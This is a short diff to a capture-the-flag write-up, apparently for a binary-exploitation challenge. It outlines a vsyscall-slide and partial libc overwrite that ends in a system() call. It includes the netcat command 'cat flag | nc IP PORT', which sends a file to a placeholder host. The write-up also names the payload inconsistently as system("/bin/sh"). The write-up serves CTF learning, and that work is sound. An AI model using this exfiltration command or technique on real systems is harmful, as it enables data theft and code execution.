perfectblue/ctf-writeups/whitehat-grandprix-2018/pwn03-onehit.md

 2. Make sure that when we start jumping to the `vsyscall` "slide", `rdi+127` holds the string `"cat flag | nc IP PORT"` (this is easily done because `rdi+127` is controlled by us!).

-3. Once we read the libc address, overwrite it partially with 3 bytes - these 3 bytes will be the 3 least significant bytes of the "patched-in" gadgets, which will finally execute: `system(rdi+127)` which is `system("/bin/sh")`.
+3. Once we reach the libc address, overwrite it partially with 3 bytes - these 3 bytes will be the 3 least significant bytes of the "patched-in" gadgets, which will finally execute: `system(rdi+127)` which is `system("/bin/sh")`.

 4. Profit!